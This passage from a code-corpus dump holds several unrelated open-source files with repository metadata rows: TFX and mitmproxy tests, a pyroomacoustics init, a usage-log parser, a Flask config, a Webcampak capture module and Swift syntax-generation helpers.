self.source_uri = 'm/y/u/r/i'
self.existing_artifacts = []
existing_artifact = standard_artifacts.Examples()
existing_artifact.uri = self.source_uri
existing_artifact.split_names = self.properties['split_names']
self.existing_artifacts.append(existing_artifact)
self.pipeline_info = data_types.PipelineInfo(
pipeline_name='p_name', pipeline_root='p_root', run_id='run_id')
self.component_info = data_types.ComponentInfo(
component_type='c_type',
component_id='c_id',
pipeline_info=self.pipeline_info)
self.driver_args = data_types.DriverArgs(enable_cache=True)
def _callImporterDriver(self, reimport: bool):
with metadata.Metadata(connection_config=self.connection_config) as m:
m.publish_artifacts(self.existing_artifacts)
driver = importer.ImporterDriver(metadata_handler=m)
execution_result = driver.pre_execution(
component_info=self.component_info,
pipeline_info=self.pipeline_info,
driver_args=self.driver_args,
input_dict={},
output_dict=self.output_dict,
exec_properties={
importer.SOURCE_URI_KEY: self.source_uri,
importer.REIMPORT_OPTION_KEY: int(reimport),
})
self.assertFalse(execution_result.use_cached_results)
self.assertEmpty(execution_result.input_dict)
self.assertEqual(
1, len(execution_result.output_dict[importer.IMPORT_RESULT_KEY]))
self.assertEqual(
execution_result.output_dict[importer.IMPORT_RESULT_KEY][0].uri,
self.source_uri)
self.assertNotEmpty(self.output_dict[importer.IMPORT_RESULT_KEY].get())
results = self.output_dict[importer.IMPORT_RESULT_KEY].get()
self.assertEqual(1, len(results))
result = results[0]
self.assertEqual(result.uri, result.uri)
for key, value in self.properties.items():
self.assertEqual(value, getattr(result, key))
for key, value in self.custom_properties.items():
if isinstance(value, int):
self.assertEqual(value, result.get_int_custom_property(key))
elif isinstance(value, (str, bytes)):
self.assertEqual(value, result.get_string_custom_property(key))
else:
raise ValueError('Invalid custom property value: %r.' % value)
def testImportArtifact(self):
self._callImporterDriver(reimport=True)
def testReuseArtifact(self):
self._callImporterDriver(reimport=False)
if __name__ == '__main__':
tf.test.main()
| apache-2.0 | 6,663,077,504,231,607,000 | 36.680982 | 77 | 0.676327 | false |
LCAV/pyroomacoustics | pyroomacoustics/denoise/__init__.py | 1 | 1165 | """
Single Channel Noise Reduction
==============================
Collection of single channel noise reduction (SCNR) algorithms for speech:
- :doc:`Spectral Subtraction <pyroomacoustics.denoise.spectral_subtraction>` [1]_
- :doc:`Subspace Approach <pyroomacoustics.denoise.subspace>` [2]_
- :doc:`Iterative Wiener Filtering <pyroomacoustics.denoise.iterative_wiener>` [3]_
At `this repository <https://github.com/santi-pdp/segan>`_, a deep learning approach in Python can be found.
References
----------
.. [1] M. Berouti, R. Schwartz, and J. Makhoul, *Enhancement of speech corrupted by acoustic noise,*
ICASSP '79. IEEE International Conference on Acoustics, Speech, and Signal Processing, 1979, pp. 208-211.
.. [2] Y. Ephraim and H. L. Van Trees, *A signal subspace approach for speech enhancement,*
IEEE Transactions on Speech and Audio Processing, vol. 3, no. 4, pp. 251-266, Jul 1995.
.. [3] J. Lim and A. Oppenheim, *All-Pole Modeling of Degraded Speech,*
IEEE Transactions on Acoustics, Speech, and Signal Processing 26.3 (1978): 197-210.
"""
from .spectral_subtraction import *
from .subspace import *
from .iterative_wiener import *
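# Illustrative note, not part of the package: the spectral subtraction of [1]
# operates on STFT magnitudes. With hypothetical symbols Y (noisy frame),
# N_hat (running noise estimate), a >= 1 (over-subtraction factor) and
# 0 < b << 1 (spectral floor), the core update is roughly
#
#     |X_hat(f)|^2 = |Y(f)|^2 - a * |N_hat(f)|^2   if that stays above b * |N_hat(f)|^2
#     |X_hat(f)|^2 = b * |N_hat(f)|^2              otherwise
#
# The concrete class and function names live in the submodules imported above.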
| mit | -1,552,405,641,654,512,000 | 39.172414 | 109 | 0.712446 | false |
klpdotorg/dubdubdub | ekstepbin/ProcessUsage.py | 1 | 1985 | import os
import json
import time
import sys
DeviceList = sys.argv[1] #this takes device list as argument
TagList = sys.argv[2] #this takes Tag list as argument
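# Hedged invocation example; the file names are placeholders, not fixed inputs:
#   python ProcessUsage.py devices.txt tags.txt
# Both files are expected under ../datapull/ relative to this script, with one
# device id or tag per line, as read below.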
dir = os.path.dirname(__file__)
json_file = os.path.join(dir, '../datapull/ekstepv3data/data/ME_SESSION_SUMMARY.json')
output_file = os.path.join(dir, '../datapull/usage.txt')
usage_file = open(output_file, 'w',encoding='utf-8')
with open (os.path.join(dir, '../datapull/'+DeviceList)) as f:
device_list = [line.rstrip() for line in f]
with open (os.path.join(dir, '../datapull/'+TagList)) as e:
tag_list = [line.rstrip() for line in e]
for line in open(json_file, 'r'):
valid_data = False
data = json.loads(line)
if 'app' in data["etags"]:
if len(data["etags"]["app"]) > 0:
if str(data["etags"]["app"][0]) in tag_list:
valid_data = True
if not valid_data:
if (str(data["dimensions"]["did"]) in device_list):
valid_data = True
if valid_data:
usage_file.write( data["mid"])
usage_file.write("|")
usage_file.write( data["uid"])
usage_file.write("|")
usage_file.write( data["dimensions"]["did"])
usage_file.write("|")
usage_file.write( str(data["edata"]["eks"]["timeSpent"]))
usage_file.write("|")
usage_file.write( str(data["dimensions"]["gdata"]["id"]))
usage_file.write("|")
s=int(data["context"]["date_range"]["from"])/1000.0
usage_file.write( time.strftime("%Y-%m-%dT%H:%M:%S",time.localtime(s)))
usage_file.write("|")
s=int(data["context"]["date_range"]["to"])/1000.0
usage_file.write( time.strftime("%Y-%m-%dT%H:%M:%S",time.localtime(s)))
usage_file.write("|")
s=int(data["syncts"])/1000.0
usage_file.write( time.strftime("%Y-%m-%dT%H:%M:%S",time.localtime(s)))
usage_file.write("\n")
usage_file.close()
| mit | 340,299,390,527,681,540 | 37.921569 | 86 | 0.565239 | false |
faylau/microblog | config.py | 1 | 1798 | #coding=utf-8
"""
This configuration file is read by __init__.py
"""
import os
basedir = os.path.abspath(os.path.dirname(__file__))
class Config:
"""
:summary:
"""
    CSRF_ENABLED = True  # enable cross-site request forgery (CSRF) protection
    # SECRET_KEY is only needed when CSRF is enabled; it builds an encrypted token used to validate forms.
SECRET_KEY = os.environ.get('SECRET_KEY') or 'hard to guess string'
SQLALCHEMY_COMMIT_ON_TEARDOWN = True
# FLASKY_MAIL_SUBJECT_PREFIX = '[Flasky]'
# FLASKY_MAIL_SENDER = 'Flasky Admin <[email protected]>'
# FLASKY_ADMIN = os.environ.get('FLASKY_ADMIN')
@staticmethod
def init_app(app):
pass
class DevelopmentConfig(Config):
"""
:summary:
"""
DEBUG = True
# MAIL_SERVER = 'smtp.googlemail.com'
# MAIL_PORT = 587
# MAIL_USE_TLS = True
# MAIL_USERNAME = os.environ.get('MAIL_USERNAME')
# MAIL_PASSWORD = os.environ.get('MAIL_PASSWORD')
SQLALCHEMY_DATABASE_URI = os.environ.get('DEV_DATABASE_URL') or \
'sqlite:///' + os.path.join(basedir, 'data-dev.db')
SQLALCHEMY_MIGRATE_REPO = os.path.join(basedir, 'db_repository')
class TestingConfig(Config):
"""
:summary:
"""
TESTING = True
SQLALCHEMY_DATABASE_URI = os.environ.get('TEST_DATABASE_URL') or \
'sqlite:///' + os.path.join(basedir,
'data-test.db')
class ProductionConfig(Config):
"""
:summary:
"""
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL') or \
'sqlite:///' + os.path.join(basedir, 'data.db')
config = {'development': DevelopmentConfig,
'testing': TestingConfig,
'production': ProductionConfig,
'default': DevelopmentConfig} | apache-2.0 | -8,939,346,742,033,719,000 | 24.742424 | 73 | 0.592462 | false |
vhaupert/mitmproxy | test/mitmproxy/tools/console/test_keymap.py | 1 | 5997 | from mitmproxy.tools.console import keymap
from mitmproxy.test import taddons
from unittest import mock
import pytest
def test_binding():
b = keymap.Binding("space", "cmd", ["options"], "")
assert b.keyspec() == " "
def test_bind():
with taddons.context() as tctx:
km = keymap.Keymap(tctx.master)
km.executor = mock.Mock()
with pytest.raises(ValueError):
km.add("foo", "bar", ["unsupported"])
km.add("key", "str", ["options", "commands"])
assert km.get("options", "key")
assert km.get("commands", "key")
assert not km.get("flowlist", "key")
assert len((km.list("commands"))) == 1
km.handle("unknown", "unknown")
assert not km.executor.called
km.handle("options", "key")
assert km.executor.called
km.add("glob", "str", ["global"])
km.executor = mock.Mock()
km.handle("options", "glob")
assert km.executor.called
assert len((km.list("global"))) == 1
def test_join():
with taddons.context() as tctx:
km = keymap.Keymap(tctx.master)
km.add("key", "str", ["options"], "help1")
km.add("key", "str", ["commands"])
assert len(km.bindings) == 1
assert len(km.bindings[0].contexts) == 2
assert km.bindings[0].help == "help1"
km.add("key", "str", ["commands"], "help2")
assert len(km.bindings) == 1
assert len(km.bindings[0].contexts) == 2
assert km.bindings[0].help == "help2"
assert km.get("commands", "key")
km.unbind(km.bindings[0])
assert len(km.bindings) == 0
assert not km.get("commands", "key")
def test_remove():
with taddons.context() as tctx:
km = keymap.Keymap(tctx.master)
km.add("key", "str", ["options", "commands"], "help1")
assert len(km.bindings) == 1
assert "options" in km.bindings[0].contexts
km.remove("key", ["options"])
assert len(km.bindings) == 1
assert "options" not in km.bindings[0].contexts
km.remove("key", ["commands"])
assert len(km.bindings) == 0
def test_load_path(tmpdir):
dst = str(tmpdir.join("conf"))
kmc = keymap.KeymapConfig()
with taddons.context(kmc) as tctx:
km = keymap.Keymap(tctx.master)
tctx.master.keymap = km
with open(dst, 'wb') as f:
f.write(b"\xff\xff\xff")
with pytest.raises(keymap.KeyBindingError, match="expected UTF8"):
kmc.load_path(km, dst)
with open(dst, 'w') as f:
f.write("'''")
with pytest.raises(keymap.KeyBindingError):
kmc.load_path(km, dst)
with open(dst, 'w') as f:
f.write(
"""
- key: key1
ctx: [unknown]
cmd: >
foo bar
foo bar
"""
)
with pytest.raises(keymap.KeyBindingError):
kmc.load_path(km, dst)
with open(dst, 'w') as f:
f.write(
"""
- key: key1
ctx: [chooser]
help: one
cmd: >
foo bar
foo bar
"""
)
kmc.load_path(km, dst)
assert(km.get("chooser", "key1"))
with open(dst, 'w') as f:
f.write(
"""
- key: key2
ctx: [flowlist]
cmd: foo
- key: key2
ctx: [flowview]
cmd: bar
"""
)
kmc.load_path(km, dst)
assert(km.get("flowlist", "key2"))
assert(km.get("flowview", "key2"))
km.add("key123", "str", ["flowlist", "flowview"])
with open(dst, 'w') as f:
f.write(
"""
- key: key123
ctx: [options]
cmd: foo
"""
)
kmc.load_path(km, dst)
assert(km.get("flowlist", "key123"))
assert(km.get("flowview", "key123"))
assert(km.get("options", "key123"))
def test_parse():
kmc = keymap.KeymapConfig()
with taddons.context(kmc):
assert kmc.parse("") == []
assert kmc.parse("\n\n\n \n") == []
with pytest.raises(keymap.KeyBindingError, match="expected a list of keys"):
kmc.parse("key: val")
with pytest.raises(keymap.KeyBindingError, match="expected a list of keys"):
kmc.parse("val")
with pytest.raises(keymap.KeyBindingError, match="Unknown key attributes"):
kmc.parse(
"""
- key: key1
nonexistent: bar
"""
)
with pytest.raises(keymap.KeyBindingError, match="Missing required key attributes"):
kmc.parse(
"""
- help: key1
"""
)
with pytest.raises(keymap.KeyBindingError, match="Invalid type for cmd"):
kmc.parse(
"""
- key: key1
cmd: [ cmd ]
"""
)
with pytest.raises(keymap.KeyBindingError, match="Invalid type for ctx"):
kmc.parse(
"""
- key: key1
ctx: foo
cmd: cmd
"""
)
assert kmc.parse(
"""
- key: key1
ctx: [one, two]
help: one
cmd: >
foo bar
foo bar
"""
) == [{"key": "key1", "ctx": ["one", "two"], "help": "one", "cmd": "foo bar foo bar\n"}] | mit | 3,016,700,950,650,680,000 | 29.602041 | 96 | 0.44739 | false |
Webcampak/cli | webcampak/core/wpakCapture.py | 1 | 22904 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2010-2016 Eurotechnia ([email protected])
# This file is part of the Webcampak project.
# Webcampak is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License,
# or (at your option) any later version.
# Webcampak is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
# without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along with Webcampak.
# If not, see http://www.gnu.org/licenses/
import os
import time
import gettext
from wpakConfigObj import Config
from wpakFileUtils import fileUtils
from wpakTimeUtils import timeUtils
from wpakTransferUtils import transferUtils
from wpakPhidgetsUtils import phidgetsUtils
from capture.wpakCaptureUtils import captureUtils
from capture.wpakCaptureEmails import captureEmails
from capture.wpakCaptureObj import captureObj
from capture.wpakSensorsObj import sensorsObj
from capture.drivers.wpakCaptureGphoto import captureGphoto
from capture.drivers.wpakCaptureIPCam import captureIPCam
from capture.drivers.wpakCaptureWebfile import captureWebfile
from capture.drivers.wpakCaptureTestPicture import captureTestPicture
from capture.drivers.wpakCaptureWpak import captureWpak
from capture.drivers.wpakCaptureRtsp import captureRtsp
from capture.drivers.wpakCapturePhidget import capturePhidget
from wpakPictureTransformations import pictureTransformations
from wpakFTPUtils import FTPUtils
# This class is used to capture a picture or sensors from a source
class Capture(object):
""" This class is used to capture from a source
Args:
log: A class, the logging interface
appConfig: A class, the app config interface
config_dir: A string, filesystem location of the configuration directory
sourceId: Source ID of the source to capture
Attributes:
tbc
"""
def __init__(self, log, appConfig, config_dir, sourceId):
self.log = log
self.appConfig = appConfig
self.config_dir = config_dir
self.currentSourceId = sourceId
self.setSourceId(sourceId)
self.configPaths = Config(self.log, self.config_dir + 'param_paths.yml')
self.dirEtc = self.configPaths.getConfig('parameters')['dir_etc']
self.dirConfig = self.configPaths.getConfig('parameters')['dir_config']
self.dirBin = self.configPaths.getConfig('parameters')['dir_bin']
self.dirSources = self.configPaths.getConfig('parameters')['dir_sources']
self.dirSourceLive = self.configPaths.getConfig('parameters')['dir_source_live']
self.dirSourceCapture = self.configPaths.getConfig('parameters')['dir_source_capture']
self.dirLocale = self.configPaths.getConfig('parameters')['dir_locale']
self.dirLocaleMessage = self.configPaths.getConfig('parameters')['dir_locale_message']
self.dirStats = self.configPaths.getConfig('parameters')['dir_stats']
self.dirCache = self.configPaths.getConfig('parameters')['dir_cache']
self.dirEmails = self.configPaths.getConfig('parameters')['dir_emails']
self.dirResources = self.configPaths.getConfig('parameters')['dir_resources']
self.dirLogs = self.configPaths.getConfig('parameters')['dir_logs']
self.dirXferQueue = self.configPaths.getConfig('parameters')['dir_xfer'] + 'queued/'
self.dirCurrentSource = self.dirSources + 'source' + self.currentSourceId + '/'
self.dirCurrentSourceTmp = self.dirSources + 'source' + self.currentSourceId + '/' + \
self.configPaths.getConfig('parameters')['dir_source_tmp']
self.dirCurrentSourceCapture = self.dirSources + 'source' + self.currentSourceId + '/' + self.dirSourceCapture
self.dirCurrentSourcePictures = self.dirSources + 'source' + self.currentSourceId + '/' + \
self.configPaths.getConfig('parameters')['dir_source_pictures']
self.dirCurrentSourceLogs = self.dirLogs + 'source' + self.currentSourceId + '/'
self.setupLog()
self.log.info("===START===")
self.log.info("capture(): Start")
self.configGeneral = Config(self.log, self.dirConfig + 'config-general.cfg')
self.configSource = Config(self.log, self.dirEtc + 'config-source' + str(self.getSourceId()) + '.cfg')
self.configSourceFTP = Config(self.log,
self.dirEtc + 'config-source' + str(self.currentSourceId) + '-ftpservers.cfg')
self.dirCurrentLocaleMessages = self.dirLocale + self.configSource.getConfig(
'cfgsourcelanguage') + "/" + self.dirLocaleMessage
self.initGetText(self.dirLocale, self.configGeneral.getConfig('cfgsystemlang'),
self.configGeneral.getConfig('cfggettextdomain'))
self.timeUtils = timeUtils(self)
self.fileUtils = fileUtils(self)
self.phidgetsUtils = phidgetsUtils(self)
self.FTPUtils = FTPUtils(self)
self.transferUtils = transferUtils(self)
self.setScriptStartTime(self.timeUtils.getCurrentSourceTime(self.configSource))
# By default, the picture date corresponds to the time the script started
self.log.info("capture(): " + _("Set Capture Time to script start time (default at script startup)"))
self.setCaptureTime(self.getScriptStartTime())
fileCaptureDetails = self.dirSources + 'source' + self.currentSourceId + '/' + self.dirSourceLive + 'last-capture.json'
fileCaptureLog = self.dirCurrentSourceCapture + self.getCaptureTime().strftime("%Y%m%d") + ".jsonl"
self.log.info("capture(): " + _("Create Capture Status object and set script start date"))
self.currentCaptureDetails = captureObj(self.log, fileCaptureLog)
self.currentCaptureDetails.setCaptureFile(fileCaptureDetails)
self.currentCaptureDetails.setCaptureValue('scriptStartDate', self.getScriptStartTime().isoformat())
self.log.info("capture(): " + _("Load previous Capture Status Object (if available)"))
self.lastCaptureDetails = captureObj(self.log)
self.lastCaptureDetails.setCaptureFile(fileCaptureDetails)
self.lastCaptureDetails.loadCaptureFile()
self.captureUtils = captureUtils(self)
self.captureEmails = captureEmails(self)
self.pictureTransformations = pictureTransformations(self)
self.captureUtils.setPictureTransformations(self.pictureTransformations)
self.log.info("capture(): " + _("Initializing the following capture driver: %(captureDriver)s") % {
'captureDriver': self.configSource.getConfig('cfgsourcetype')})
if self.configSource.getConfig('cfgsourcetype') == "gphoto":
# If the source is a gphoto camera
self.captureDriver = captureGphoto(self)
elif self.configSource.getConfig('cfgsourcetype') == "testpicture":
# The source is using a test picture, randomly modified
self.captureDriver = captureTestPicture(self)
elif self.configSource.getConfig('cfgsourcetype') == "ipcam" or (
self.configSource.getConfig('cfgsourcetype') == "wpak" and self.configSource.getConfig(
'cfgsourcewpaktype') == "rec"):
# If the source is an IP Camera
self.captureDriver = captureIPCam(self)
elif self.configSource.getConfig('cfgsourcetype') == "webfile":
# If the source is a Web File
self.captureDriver = captureWebfile(self)
elif self.configSource.getConfig('cfgsourcetype') == "wpak" and self.configSource.getConfig(
'cfgsourcewpaktype') == "get":
# If the source is another source of the same Webcampak
self.captureDriver = captureWpak(self)
elif self.configSource.getConfig('cfgsourcetype') == "rtsp":
# If the source is a RTSP stream
self.captureDriver = captureRtsp(self)
self.captureFilename = None
def setupLog(self):
""" Setup logging to file"""
if not os.path.exists(self.dirCurrentSourceLogs):
os.makedirs(self.dirCurrentSourceLogs)
logFilename = self.dirCurrentSourceLogs + "capture.log"
self.appConfig.set(self.log._meta.config_section, 'file', logFilename)
self.appConfig.set(self.log._meta.config_section, 'rotate', True)
self.appConfig.set(self.log._meta.config_section, 'max_bytes', 512000)
self.appConfig.set(self.log._meta.config_section, 'max_files', 10)
self.log._setup_file_log()
def initGetText(self, dirLocale, cfgsystemlang, cfggettextdomain):
""" Initialize Gettext with the corresponding translation domain
Args:
dirLocale: A string, directory location of the file
cfgsystemlang: A string, webcampak-level language configuration parameter from config-general.cfg
cfggettextdomain: A string, webcampak-level gettext domain configuration parameter from config-general.cfg
Returns:
None
"""
self.log.debug("capture.initGetText(): Start")
try:
t = gettext.translation(cfggettextdomain, dirLocale, [cfgsystemlang], fallback=True)
_ = t.ugettext
t.install()
self.log.info("capture.initGetText(): " + _(
"Initialized gettext with Domain: %(cfggettextdomain)s - Language: %(cfgsystemlang)s - Path: %(dirLocale)s")
% {'cfggettextdomain': cfggettextdomain, 'cfgsystemlang': cfgsystemlang,
'dirLocale': dirLocale})
except:
self.log.error("No translation file available")
# Setters and Getters
def setScriptStartTime(self, scriptStartTime):
self.log.info("capture.setScriptStartTime(): " + _("Script Start Time set to: %(scriptStartTime)s") % {
'scriptStartTime': scriptStartTime.isoformat()})
self.scriptStartTime = scriptStartTime
def getScriptStartTime(self):
return self.scriptStartTime
def setCaptureFilename(self, captureFilename):
self.captureFilename = captureFilename
def getCaptureFilename(self):
return self.captureFilename
def setSourceId(self, sourceId):
self.sourceId = sourceId
def getSourceId(self):
return self.sourceId
def setCaptureTime(self, captureTime=None):
if captureTime == None:
self.captureTime = self.timeUtils.getCurrentSourceTime(self.configSource)
else:
self.captureTime = captureTime
self.log.info("capture.setCaptureTime(): " + _("Capture Time set to: %(captureTime)s") % {
'captureTime': str(self.captureTime)})
return self.captureTime
def getCaptureTime(self):
return self.captureTime
def run(self):
""" Initiate the capture process for the source """
self.log.info("capture.run(): " + _("Initiate capture process for source: %(currentSourceId)s") % {
'currentSourceId': str(self.sourceId)})
# There might be a need to delay the capture by a couple of seconds
if self.configSource.getConfig('cfgcapturedelay') != "0":
self.log.info("capture.run(): " + _("Delaying capture by %(CaptureDelay)s seconds.") % {
'CaptureDelay': str(self.configSource.getConfig('cfgcapturedelay'))})
time.sleep(int(self.configSource.getConfig('cfgcapturedelay')))
if self.configSource.getConfig('cfgcapturedelaydate') != "script":
self.setCaptureTime()
if self.configSource.getConfig('cfgnocapture') == "yes":
self.log.info("capture.run(): " + _("Capture manually disabled via administration panel"))
elif self.configSource.getConfig('cfgsourceactive') != "yes":
self.log.info("capture.run(): " + _("Source is not active, not proceeding with capture"))
elif self.captureUtils.isWithinTimeframe() == False:
self.log.info("capture.run(): " + _("Capture calendar is active but capture not in the correct timeframe"))
elif self.captureUtils.checkInterval() == False:
self.log.info("capture.run(): " + _("Not enough time since last picture was captured, not proceeding"))
else:
# Capture the picture and return an array containing one or more files to be processed
# If multiple files are being processed, the captureDate value is the one of the latest picture captured
capturedPictures = self.captureDriver.capture()
# Used to count the number of times pictures are being processed,
# since we only want to generate hotlink images once per capture cycle
processedPicturesCount = 0
if capturedPictures != False:
for currentPicture in capturedPictures:
self.log.info("capture.run(): " + _("Begin processing of picture: %(currentPicture)s") % {
'currentPicture': currentPicture})
# Set picture filename
self.setCaptureFilename(os.path.splitext(os.path.basename(currentPicture))[0])
self.pictureTransformations.setFilesourcePath(currentPicture)
self.pictureTransformations.setFiledestinationPath(currentPicture)
# Process pictures (crop, resize, watermark, legend, ...)
if processedPicturesCount == 0 or self.configSource.getConfig(
'cfgsourcecamiplimiterotation') != "yes":
self.captureUtils.modifyPictures(True)
else: # Only generate the hotlink for the first picture being processed
self.captureUtils.modifyPictures(False)
# Copy pictures to live/ directory as last-capture.jpg or last-capture.raw
if self.configSource.getConfig('cfghotlinkmax') != "no":
self.captureUtils.createLivePicture(self.getCaptureFilename())
# Archive picture to its definitive location
self.captureUtils.archivePicture(self.getCaptureFilename())
# Create hotlinks and send those by FTP if enabled
self.captureUtils.generateHotlinks()
# Send file to first remote FTP Server
self.captureUtils.sendPicture(self.configSource.getConfig('cfgftpmainserverid'),
self.configSource.getConfig('cfgftpmainserverretry'),
self.configSource.getConfig('cfgftpmainserverraw'),
self.captureFilename)
# Send file to second remote FTP Server
self.captureUtils.sendPicture(self.configSource.getConfig('cfgftpsecondserverid'),
self.configSource.getConfig('cfgftpsecondserverretry'),
self.configSource.getConfig('cfgftpsecondserverraw'),
self.captureFilename)
# Copy file to first internal source
if self.configSource.getConfig('cfgcopymainenable') == "yes":
self.captureUtils.copyPicture(self.configSource.getConfig('cfgcopymainsourceid'),
self.configSource.getConfig('cfgcopymainsourceraw'),
self.captureFilename)
# Copy file to second internal source
if self.configSource.getConfig('cfgcopysecondenable') == "yes":
self.captureUtils.copyPicture(self.configSource.getConfig('cfgcopysecondsourceid'),
self.configSource.getConfig('cfgcopysecondsourceraw'),
self.captureFilename)
                    # Automatically purge old pictures
self.captureUtils.purgePictures(self.getCaptureFilename())
storedJpgSize = self.captureUtils.getArchivedSize(self.getCaptureFilename(), "jpg")
storedRawSize = self.captureUtils.getArchivedSize(self.getCaptureFilename(), "raw")
self.currentCaptureDetails.setCaptureValue('storedJpgSize',
self.currentCaptureDetails.getCaptureValue(
'storedJpgSize') + storedJpgSize)
self.currentCaptureDetails.setCaptureValue('storedRawSize',
self.currentCaptureDetails.getCaptureValue(
'storedRawSize') + storedRawSize)
self.currentCaptureDetails.setCaptureValue('totalCaptureSize',
self.currentCaptureDetails.getCaptureValue(
'totalCaptureSize') + int(
storedJpgSize + storedRawSize))
processedPicturesCount = processedPicturesCount + 1
self.log.info("capture.run(): " + _("Capture process completed"))
self.currentCaptureDetails.setCaptureValue('captureSuccess', True)
if os.path.isfile(self.dirCache + "source" + self.currentSourceId + "-errorcount"):
os.remove(self.dirCache + "source" + self.currentSourceId + "-errorcount")
else:
self.log.info("capture.run(): " + _("Unable to capture picture"))
self.captureUtils.generateFailedCaptureHotlink()
self.currentCaptureDetails.setCaptureValue('captureSuccess', False)
self.captureUtils.setCustomCounter('errorcount', int(self.captureUtils.getCustomCounter('errorcount')) + 1)
if self.configSource.getConfig('cfgcapturedeleteafterdays') != "0":
# Purge old pictures (by day)
self.captureUtils.deleteOldPictures()
if self.configSource.getConfig('cfgcapturemaxdirsize') != "0":
# Purge old pictures (by size)
self.captureUtils.deleteOverSize()
if self.configGeneral.getConfig('cfgstatsactivate') == "yes":
self.captureUtils.sendUsageStats()
# if self.configSource.getConfig('cfgemailcapturestats') == "yes":
# self.captureEmails.sendCaptureStats()
sensorFilename = self.getCaptureTime().strftime("%Y%m%d") + "-sensors.jsonl"
fileCaptureLog = self.dirCurrentSourcePictures + self.getCaptureTime().strftime("%Y%m%d") + "/" + sensorFilename
if self.configGeneral.getConfig('cfgphidgetactivate') == "yes" and self.configSource.getConfig(
'cfgphidgetactivate') == "yes":
capturedSensors = capturePhidget(self).capture()
currentSensorsDetails = sensorsObj(self.log, fileCaptureLog)
currentSensorsDetails.setSensorsValue('date', self.getCaptureTime().isoformat())
currentSensorsDetails.setSensorsValue('sensors', capturedSensors)
# Record capture interval
sourceCaptureInterval = int(self.configSource.getConfig('cfgcroncapturevalue'))
if self.configSource.getConfig('cfgcroncaptureinterval') == "minutes":
sourceCaptureInterval = int(self.configSource.getConfig('cfgcroncapturevalue')) * 60
currentSensorsDetails.setSensorsValue('interval', sourceCaptureInterval)
currentSensorsDetails.archiveSensorsFile()
        # If the phidget sensor file exists, it is sent through the chain.
if (os.path.isfile(fileCaptureLog)):
# Send file to first remote FTP Server
self.captureUtils.sendSensor(self.configSource.getConfig('cfgftpmainserverid'),
self.configSource.getConfig('cfgftpmainserverretry'),
sensorFilename)
# Send file to second remote FTP Server
self.captureUtils.sendSensor(self.configSource.getConfig('cfgftpsecondserverid'),
self.configSource.getConfig('cfgftpsecondserverretry'),
sensorFilename)
# Copy file to first internal source
if self.configSource.getConfig('cfgcopymainenable') == "yes":
self.captureUtils.copySensor(self.configSource.getConfig('cfgcopymainsourceid'),
sensorFilename)
# Copy file to second internal source
if self.configSource.getConfig('cfgcopysecondenable') == "yes":
self.captureUtils.copySensor(self.configSource.getConfig('cfgcopysecondsourceid'),
sensorFilename)
scriptEndDate = self.timeUtils.getCurrentSourceTime(self.configSource)
totalCaptureTime = int((scriptEndDate - self.getScriptStartTime()).total_seconds() * 1000)
self.log.info("capture.run(): " + _("Capture: Overall capture time: %(TotalCaptureTime)s ms") % {
'TotalCaptureTime': str(totalCaptureTime)})
self.currentCaptureDetails.setCaptureValue('scriptEndDate', scriptEndDate.isoformat())
self.currentCaptureDetails.setCaptureValue('scriptRuntime', totalCaptureTime)
self.currentCaptureDetails.setCaptureValue('processedPicturesCount', processedPicturesCount)
# Two different files are being stored here:
        # - The last-capture file, which is only stored if the capture is successful
# - The capture archive, which contains all capture requests (successful or not)
if capturedPictures != False:
self.currentCaptureDetails.writeCaptureFile()
self.currentCaptureDetails.archiveCaptureFile()
self.log.info(
"capture.run(): " + _("-----------------------------------------------------------------------"))
self.log.info("===END===")
| gpl-3.0 | -3,304,625,089,856,374,300 | 56.26 | 127 | 0.627925 | false |
tjw/swift | utils/gyb_syntax_support/__init__.py | 1 | 3605 | import textwrap
from AttributeNodes import ATTRIBUTE_NODES
from CommonNodes import COMMON_NODES # noqa: I201
from DeclNodes import DECL_NODES # noqa: I201
from ExprNodes import EXPR_NODES # noqa: I201
from GenericNodes import GENERIC_NODES # noqa: I201
from PatternNodes import PATTERN_NODES # noqa: I201
from StmtNodes import STMT_NODES # noqa: I201
import Token
from TypeNodes import TYPE_NODES # noqa: I201
# Re-export global constants
SYNTAX_NODES = COMMON_NODES + EXPR_NODES + DECL_NODES + ATTRIBUTE_NODES + \
STMT_NODES + GENERIC_NODES + TYPE_NODES + PATTERN_NODES
SYNTAX_TOKENS = Token.SYNTAX_TOKENS
SYNTAX_TOKEN_MAP = Token.SYNTAX_TOKEN_MAP
def make_missing_child(child):
"""
Generates a C++ call to make the raw syntax for a given Child object.
"""
if child.is_token():
token = child.main_token()
tok_kind = token.kind if token else "unknown"
tok_text = token.text if token else ""
return 'RawSyntax::missing(tok::%s, "%s")' % (tok_kind, tok_text)
else:
missing_kind = "Unknown" if child.syntax_kind == "Syntax" \
else child.syntax_kind
if child.node_choices:
return make_missing_child(child.node_choices[0])
return 'RawSyntax::missing(SyntaxKind::%s)' % missing_kind
def check_child_condition_raw(child):
"""
Generates a C++ closure to check whether a given raw syntax node can
satisfy the requirements of child.
"""
result = '[](const RC<RawSyntax> &Raw) {\n'
result += ' // check %s\n' % child.name
if child.token_choices:
result += 'if (!Raw->isToken()) return false;\n'
result += 'auto TokKind = Raw->getTokenKind();\n'
tok_checks = []
for choice in child.token_choices:
tok_checks.append("TokKind == tok::%s" % choice.kind)
result += 'return %s;\n' % (' || '.join(tok_checks))
elif child.text_choices:
result += 'if (!Raw->isToken()) return false;\n'
result += 'auto Text = Raw->getTokenText();\n'
tok_checks = []
for choice in child.text_choices:
tok_checks.append('Text == "%s"' % choice)
result += 'return %s;\n' % (' || '.join(tok_checks))
elif child.node_choices:
node_checks = []
for choice in child.node_choices:
node_checks.append(check_child_condition_raw(choice) + '(Raw)')
result += 'return %s;\n' % ((' || ').join(node_checks))
else:
result += 'return %s::kindof(Raw->getKind());' % child.type_name
result += '}'
return result
def make_missing_swift_child(child):
"""
Generates a Swift call to make the raw syntax for a given Child object.
"""
if child.is_token():
token = child.main_token()
tok_kind = token.swift_kind() if token else "unknown"
if not token or not token.text:
tok_kind += '("")'
return 'RawSyntax.missingToken(.%s)' % tok_kind
else:
missing_kind = "unknown" if child.syntax_kind == "Syntax" \
else child.swift_syntax_kind
return 'RawSyntax.missing(.%s)' % missing_kind
def create_node_map():
"""
Creates a lookup table to find nodes by their kind.
"""
